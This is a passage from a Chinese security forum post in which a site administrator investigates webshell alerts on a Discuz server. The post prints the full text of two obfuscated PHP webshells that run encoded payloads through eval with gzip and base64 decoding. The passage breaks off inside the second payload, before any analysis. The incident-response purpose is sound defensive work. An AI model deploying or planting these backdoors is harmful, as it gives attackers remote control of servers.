[【通过】] 记一次菊花被捅之后的溯源

[复制链接]
许繁 发表于 2018-3-30 17:35:30 | 显示全部楼层 |阅读模式

正式成员|主题 |帖子 |积分 106

- ## 0x01 前记
    起因是,今天老板给我发了一截图
> 尊敬的28*******@qq.com:
安骑士检测到您的服务器:120.26.***.***(iZ******)存在网站后门文件。
建议您登录云盾-安骑士控制台进行木马文件确认并处理。


我真的是佩服了,我所维护的站点不过不是一个小站点,这。。。也太蛋疼了吧。这么看得起我??

- ## 0x02 初见端倪
    服务器环境:`discuz magapp kodexporer phpmyadmin  lnmp  redis` 服务器上就这些东西,应该不存在啥大的漏洞吧
    登陆骑士看看详情:
>
/www/web/xxxx/public_html/template/strong_say/touch/common/tools_ajax.php 点击下载 待隔离 <span style="border-bottom:1px dashed #ccc;">2018-02-09</span> 05:02:10 Webshell 隔离|忽略
/www/web/xxx/public_html/source/plugin/dzapp_hd/module/hd_seyu.php 下载 待隔离 <span style="border-bottom:1px dashed #ccc;">2018-02-08</span> 04:49:02 Webshell 隔离|忽略


将两个文件下载下来
文件1
```php
<?php
$SQPq='p'.'r'.'e'.'g'.'_re'.'pla'.'c'.'e';
$SQPq("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",".");
?>

```
文件2
```php
<?php
$func="cr"."eat"."e_fun"."cti"."on";$cIZq=$func('$x','ev'.'al'.'("?>".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');$cIZq("7X1rcxxHcuBnKkL/oTULuWfMwbxAgMSDIPEGSBAA8QYIeKKnuwfTRM90q7sHD1L6MVpH2Ir13q0okaJ0EqmVKK1ErixyJZqSN9brtUOxcRGK3Th5L85nyXvhzKyqfk0PAFLSbfjiQALTXY+srKzMrKysrJqBM3bNfvop3XEsp+zotuV4RmMrPVYem5+fnc/0P/3UWaNhlF3dS8ua4dqmsl+mwq6clWerVTlapK7slfU9XW16htUoe0Zdl7OlAvzEiul1y9kvm0bd8ABOqbvnAgEyqum61p3uKC+MzS+PzV+SJxcX58pL8FYemhibWZQ3c6nGWr1hNfVtYy+VkZ45fVqSq2pFUXT1pHqq6+SpSuVUqdhz8mS1UOqpFHS9cqpXlp5/XkqAOzRxcXpmZnpifigJrlzq7elVqie7T52oKKVisaeq9FZ7ek5oJ4tdJzTtREHOXH36qWM1XdF0J51CiPliriidKJyQZixPGreaDS2FvTqmqzVLkmcsyWjYTU+qGqYuubauGlVD13Jyv75neGks+cLTTwl4qtXw9IbXubhv632Sp+95+ZpXN/sltaY4QMTTW5VSV7FEDVSbDRUJLrmeoxlOugM+M9JVydG9pkOpOLSmouppxXGU/bS8sQFkz+fhz7Olk/S3JGeyPBOT8XdDhj8pSAf0bQY00y+9EGpPrW1v2Wq6gypii1XL0RW1xlMkxZU6tvV96fSg1LGjEE4s5xImb0qnJcMts1ZZ/hkfJL32Ie6G7ZqKW9NdlggYiI4xWIRSR32fyHpaCgZ5YWR+am6xPD41PTYzdGFM3gTwgkLtC/FWsVSZkstlpHHQAGTaFiDDErKyvqOY6YyMyBM+ZbdmVL20vmeblqan5bSc5WUzCJs/A0hNrxoNKLA4ObUwOjUvZ3mz8NtQ6rpoIZOD0chkQhXmZ2cXwxXgw3N8hBg9Wzo6NzkHz9Pj2EMYDxlAtgAeW51aWFwoQ9GpmfFZObulgzaoWmnsm+c0dUC/qpiuzmUVsst1ZctQy881LU93yzhyGRrl8tzswiIQSwwnvTPu6dg1GkjGZgVwTCNaswvZQrYL0AJhXpmakWOtEfXdLaiTevD+/R+++fn9h6kw12Ovd9Md+IF0y9KTpngKe6rDKABOIIeAcvoZ4Lhdx/CUiqkHdQDpP/szAgTqy3A9N5J1FboBUEJNFHp6elhvjnXUlIZGjFG1bL0Rx4NaRyXABEGqggYA6KxSgCoVqaqm5eoik5IEp0Nlph8ivXZCaFIP2yMjOzJDQ7SIZUBYNR8XzHCNKxGqHIKVgJWAWjMAw8cBHyscTUaLurWjl5sgJqDytDKWaVephSFwLJ9BMMRtDJxq2ftHBEAjdzBttThtscV2HMJB+dhZlbLe0MqqqSuNNKM7lgQkK4qrM+n2q1M2U5inJV9t5EBt+Nl8VpBH+Kzg0ayg2LZpqAqinN/rlHNM/diorJlGTqw7CtO45RpYC0B4HujrOqT3SwKh03KufcvTemPLq/VJcq4dv5xFrooOJpsFYZaL0dmtWbukpeAP5wx4YjpWpJOS4iOeDvj7LPK3X5d0x8zS9HTrUPiUZXqRQO3WED0qQiZEWowOok5AObNnGFbYNi8CKipHBkXoPQfKH+dro9GkJo912IpXw7kI8aeCLJm3wvU1yaWYkGWZtDKbjlPipcT0MyEAiotQQ9iZ0FQKdpkjb16idJxSWXvE4cd07GFQEsejTVH8JUEPdz8s62yujY6fppueo+vh8WszQAdS/ez3S/azXHtjbrZw8uTJ9iT1O4QpjPMihDzbbJhGY5vXCCh39iDSnXXqYTpEBIDkp7IPk6evZNirNCAVC6UTPj+zVKDBsJzA1fIwcM15+L0AvxPwuyi0vWlZKFD0mTatLb+1vIRv1EYYWdd2jIZXTcvP5kpVILKw1wjAZpZXz9vWLtXNMsAsG8Yt3kGwKzSujbJoQcLignU02VLEMQASYEE0DniNLGX5pEB